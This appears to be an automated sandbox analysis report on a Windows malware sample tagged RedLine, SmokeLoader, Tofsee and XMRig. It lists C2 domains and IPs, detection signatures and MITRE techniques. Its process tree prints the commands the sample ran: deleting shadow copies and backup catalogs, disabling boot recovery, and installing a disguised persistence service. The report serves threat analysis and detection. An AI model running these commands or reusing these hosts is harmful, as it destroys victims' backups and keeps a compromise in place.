redline | 20ae56e2ec11dc0b943ea744a21cfd4c166a14732683664bc846286123a18e9f

Analysis

max time kernel
136s
max time network
154s
platform
windows7_x64
resource
win7v20210410
submitted
27-08-2021 08:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

be8fba1fa1536254d7aeab7b52344a2c.exe
Size

176KB
MD5

be8fba1fa1536254d7aeab7b52344a2c
SHA1

23f42db215a021dfa596fbb72f61e94b04cd36c0
SHA256

20ae56e2ec11dc0b943ea744a21cfd4c166a14732683664bc846286123a18e9f
SHA512

2b7d3745dd90a61cb5bb2ed80e27c6be1c9f48534264771e50226020d84faefa6c814510e90eab0777e50256e29433607a5879cd05e8a9b52fa6b66a3458caf4

Score

10^/10

redline smokeloader tofsee xmrig 1 sergey777 backdoor discovery evasion infostealer miner persistence ransomware spyware stealer themida trojan

Malware Config

Extracted

Family

smokeloader

Version

2020

http://readinglistforaugust1.xyz/

http://readinglistforaugust2.xyz/

http://readinglistforaugust3.xyz/

http://readinglistforaugust4.xyz/

http://readinglistforaugust5.xyz/

http://readinglistforaugust6.xyz/

http://readinglistforaugust7.xyz/

http://readinglistforaugust8.xyz/

http://readinglistforaugust9.xyz/

http://readinglistforaugust10.xyz/

http://readinglistforaugust1.site/

http://readinglistforaugust2.site/

http://readinglistforaugust3.site/

http://readinglistforaugust4.site/

http://readinglistforaugust5.site/

http://readinglistforaugust6.site/

http://readinglistforaugust7.site/

http://readinglistforaugust8.site/

http://readinglistforaugust9.site/

http://readinglistforaugust10.site/

rc4.i32

Extracted

Family

redline

Botnet

Sergey777

51.254.68.139:15009

Extracted

Family

redline

Botnet

176.9.244.86:16284

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 7 IoCs

resource	yara_rule
behavioral1/memory/2008-162-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/2008-163-0x000000000041A6AE-mapping.dmp	family_redline
behavioral1/memory/2008-167-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral1/memory/2216-200-0x000000000041A6AE-mapping.dmp	family_redline
behavioral1/memory/2268-207-0x0000000003100000-0x000000000311D000-memory.dmp	family_redline
behavioral1/memory/2268-209-0x0000000004890000-0x00000000048AC000-memory.dmp	family_redline
behavioral1/memory/2632-224-0x000000000041A6AE-mapping.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

XMRig Miner Payload 2 IoCs

miner

resource	yara_rule
behavioral1/memory/2524-213-0x00000000000F0000-0x00000000001E1000-memory.dmp	xmrig
behavioral1/memory/2524-217-0x000000000018259C-mapping.dmp	xmrig

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

Executes dropped EXE 11 IoCs

pid	Process
1932	D3C3.exe
676	D6C0.exe
572	D7DA.exe
1652	DB06.exe
1928	DEBF.exe
1528	DEBF.exe
1544	xniuoaew.exe
1948	svchost.exe
820	DEBF.exe
2008	DEBF.exe
788	DEBF.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Sets service image path in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	D6C0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	D6C0.exe

Deletes itself 1 IoCs

pid	Process
1256	Process not Found

Loads dropped DLL 7 IoCs

pid	Process
1928	DEBF.exe
1928	DEBF.exe
1932	D3C3.exe
1932	D3C3.exe
1928	DEBF.exe
1928	DEBF.exe
1928	DEBF.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x00040000000130e7-69.dat	themida
behavioral1/memory/676-74-0x0000000000A10000-0x0000000000A11000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run	D3C3.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\svchost.exe\" -start"	D3C3.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	D6C0.exe

Enumerates connected drives 3 TTPs 16 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\P:	svchost.exe
File opened (read-only)	\??\L:	svchost.exe
File opened (read-only)	\??\Y:	svchost.exe
File opened (read-only)	\??\X:	svchost.exe
File opened (read-only)	\??\T:	svchost.exe
File opened (read-only)	\??\S:	svchost.exe
File opened (read-only)	\??\Z:	svchost.exe
File opened (read-only)	\??\R:	svchost.exe
File opened (read-only)	\??\M:	svchost.exe
File opened (read-only)	\??\W:	svchost.exe
File opened (read-only)	\??\V:	svchost.exe
File opened (read-only)	\??\O:	svchost.exe
File opened (read-only)	\??\N:	svchost.exe
File opened (read-only)	\??\U:	svchost.exe
File opened (read-only)	\??\Q:	svchost.exe
File opened (read-only)	\??\K:	svchost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
14	geoiptool.com

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\config\systemprofile:.repos	svchost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
676	D6C0.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2004 set thread context of 1496	2004	be8fba1fa1536254d7aeab7b52344a2c.exe	26
PID 1544 set thread context of 1052	1544	xniuoaew.exe	61
PID 1928 set thread context of 2008	1928	DEBF.exe	64

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	be8fba1fa1536254d7aeab7b52344a2c.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	be8fba1fa1536254d7aeab7b52344a2c.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	be8fba1fa1536254d7aeab7b52344a2c.exe

Interacts with shadow copies 2 TTPs 2 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
1984	vssadmin.exe
2184	vssadmin.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Control Panel\Buses	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Control Panel\Buses\Config0 = e43b033d5a49360424edb47d450dd49d084297dce82e72baa4821ffd6c7d7f1db18dc65680cd945d24edb47d470dd49d024195daf71261adc06d04fda6e22673bbc9154961cda56814de8c4f7634e7a5644490bdb57c24ea9d5902cefdbb54758df21d5904e0a56f13d48549703de2aa64419bdce0286682cd0934cbc4e4241ddc9b440e34fbac6916edc70f3252a0f40948f48cb67f2dee935d0cccf48d387287cc186270a4f93824dc814d7735e6af5d19c6bd606d1dddfae996a4c48d541de5ad743d73a2e6367b9ec60b440dd49d642df4bd90762411e16d34fdc48e980fe7ad743d05fcad6e0ad882537539e2b35515ccbd844d14dda46d34fdc48d541de4ad743d04cd945d24edb47d440dd49d642df4bd844d14dda46d34fdc48d541de4ad743d0429955d24	svchost.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	svchost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	D3C3.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	D3C3.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	D3C3.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	svchost.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1496	be8fba1fa1536254d7aeab7b52344a2c.exe
1496	be8fba1fa1536254d7aeab7b52344a2c.exe
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1256	Process not Found

Suspicious behavior: MapViewOfSection 19 IoCs

pid	Process
1496	be8fba1fa1536254d7aeab7b52344a2c.exe
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1256	Process not Found
Token: SeShutdownPrivilege	1256	Process not Found
Token: SeShutdownPrivilege	1256	Process not Found
Token: SeShutdownPrivilege	1256	Process not Found
Token: SeDebugPrivilege	1932	D3C3.exe
Token: SeDebugPrivilege	1932	D3C3.exe
Token: SeDebugPrivilege	676	D6C0.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found

Suspicious use of SendNotifyMessage 4 IoCs

pid	Process
1256	Process not Found
1256	Process not Found
1256	Process not Found
1256	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2004 wrote to memory of 1496	2004	be8fba1fa1536254d7aeab7b52344a2c.exe	26
PID 2004 wrote to memory of 1496	2004	be8fba1fa1536254d7aeab7b52344a2c.exe	26
PID 2004 wrote to memory of 1496	2004	be8fba1fa1536254d7aeab7b52344a2c.exe	26
PID 2004 wrote to memory of 1496	2004	be8fba1fa1536254d7aeab7b52344a2c.exe	26
PID 2004 wrote to memory of 1496	2004	be8fba1fa1536254d7aeab7b52344a2c.exe	26
PID 2004 wrote to memory of 1496	2004	be8fba1fa1536254d7aeab7b52344a2c.exe	26
PID 2004 wrote to memory of 1496	2004	be8fba1fa1536254d7aeab7b52344a2c.exe	26
PID 1256 wrote to memory of 1932	1256	Process not Found	30
PID 1256 wrote to memory of 1932	1256	Process not Found	30
PID 1256 wrote to memory of 1932	1256	Process not Found	30
PID 1256 wrote to memory of 1932	1256	Process not Found	30
PID 1256 wrote to memory of 676	1256	Process not Found	31
PID 1256 wrote to memory of 676	1256	Process not Found	31
PID 1256 wrote to memory of 676	1256	Process not Found	31
PID 1256 wrote to memory of 676	1256	Process not Found	31
PID 1256 wrote to memory of 676	1256	Process not Found	31
PID 1256 wrote to memory of 676	1256	Process not Found	31
PID 1256 wrote to memory of 676	1256	Process not Found	31
PID 1256 wrote to memory of 572	1256	Process not Found	33
PID 1256 wrote to memory of 572	1256	Process not Found	33
PID 1256 wrote to memory of 572	1256	Process not Found	33
PID 1256 wrote to memory of 572	1256	Process not Found	33
PID 1256 wrote to memory of 1652	1256	Process not Found	34
PID 1256 wrote to memory of 1652	1256	Process not Found	34
PID 1256 wrote to memory of 1652	1256	Process not Found	34
PID 1256 wrote to memory of 1928	1256	Process not Found	35
PID 1256 wrote to memory of 1928	1256	Process not Found	35
PID 1256 wrote to memory of 1928	1256	Process not Found	35
PID 1256 wrote to memory of 1928	1256	Process not Found	35
PID 1928 wrote to memory of 1528	1928	DEBF.exe	37
PID 1928 wrote to memory of 1528	1928	DEBF.exe	37
PID 1928 wrote to memory of 1528	1928	DEBF.exe	37
PID 1928 wrote to memory of 1528	1928	DEBF.exe	37
PID 572 wrote to memory of 1464	572	D7DA.exe	39
PID 572 wrote to memory of 1464	572	D7DA.exe	39
PID 572 wrote to memory of 1464	572	D7DA.exe	39
PID 572 wrote to memory of 1464	572	D7DA.exe	39
PID 1256 wrote to memory of 1084	1256	Process not Found	42
PID 1256 wrote to memory of 1084	1256	Process not Found	42
PID 1256 wrote to memory of 1084	1256	Process not Found	42
PID 1256 wrote to memory of 1084	1256	Process not Found	42
PID 1256 wrote to memory of 1084	1256	Process not Found	42
PID 572 wrote to memory of 2040	572	D7DA.exe	43
PID 572 wrote to memory of 2040	572	D7DA.exe	43
PID 572 wrote to memory of 2040	572	D7DA.exe	43
PID 572 wrote to memory of 2040	572	D7DA.exe	43
PID 572 wrote to memory of 2012	572	D7DA.exe	45
PID 572 wrote to memory of 2012	572	D7DA.exe	45
PID 572 wrote to memory of 2012	572	D7DA.exe	45
PID 572 wrote to memory of 2012	572	D7DA.exe	45
PID 1256 wrote to memory of 1756	1256	Process not Found	47
PID 1256 wrote to memory of 1756	1256	Process not Found	47
PID 1256 wrote to memory of 1756	1256	Process not Found	47
PID 1256 wrote to memory of 1756	1256	Process not Found	47
PID 572 wrote to memory of 1072	572	D7DA.exe	48
PID 572 wrote to memory of 1072	572	D7DA.exe	48
PID 572 wrote to memory of 1072	572	D7DA.exe	48
PID 572 wrote to memory of 1072	572	D7DA.exe	48
PID 1256 wrote to memory of 1724	1256	Process not Found	50
PID 1256 wrote to memory of 1724	1256	Process not Found	50
PID 1256 wrote to memory of 1724	1256	Process not Found	50
PID 1256 wrote to memory of 1724	1256	Process not Found	50
PID 1256 wrote to memory of 1724	1256	Process not Found	50
PID 572 wrote to memory of 808	572	D7DA.exe	51

C:\Users\Admin\AppData\Local\Temp\be8fba1fa1536254d7aeab7b52344a2c.exe
"C:\Users\Admin\AppData\Local\Temp\be8fba1fa1536254d7aeab7b52344a2c.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2004
- C:\Users\Admin\AppData\Local\Temp\be8fba1fa1536254d7aeab7b52344a2c.exe
  "C:\Users\Admin\AppData\Local\Temp\be8fba1fa1536254d7aeab7b52344a2c.exe"
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:1496

C:\Users\Admin\AppData\Local\Temp\D3C3.exe
C:\Users\Admin\AppData\Local\Temp\D3C3.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:1932
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe
  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe" -start
  2⤵
  - Executes dropped EXE
  - Enumerates connected drives
  - Modifies system certificate store
  PID:1948
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
    3⤵
    PID:1804
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic shadowcopy delete
      4⤵
      PID:936
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
    3⤵
    PID:332
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
    3⤵
    PID:1188
  - - C:\Windows\SysWOW64\vssadmin.exe
      vssadmin delete shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:1984
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\svchost.exe" -agent 0
    3⤵
    PID:900
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
    3⤵
    PID:1592
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic shadowcopy delete
      4⤵
      PID:940
  - - C:\Windows\SysWOW64\vssadmin.exe
      vssadmin delete shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:2184
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    PID:972
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
    3⤵
    PID:1156
- C:\Windows\SysWOW64\notepad.exe
  notepad.exe
  2⤵
  PID:2040

C:\Users\Admin\AppData\Local\Temp\D6C0.exe
C:\Users\Admin\AppData\Local\Temp\D6C0.exe
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:676

C:\Users\Admin\AppData\Local\Temp\D7DA.exe
C:\Users\Admin\AppData\Local\Temp\D7DA.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:572
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\rqiigbpf\
  2⤵
  PID:1464
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\xniuoaew.exe" C:\Windows\SysWOW64\rqiigbpf\
  2⤵
  PID:2040
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" create rqiigbpf binPath= "C:\Windows\SysWOW64\rqiigbpf\xniuoaew.exe /d\"C:\Users\Admin\AppData\Local\Temp\D7DA.exe\"" type= own start= auto DisplayName= "wifi support"
  2⤵
  PID:2012
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" description rqiigbpf "wifi internet conection"
  2⤵
  PID:1072
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" start rqiigbpf
  2⤵
  PID:808
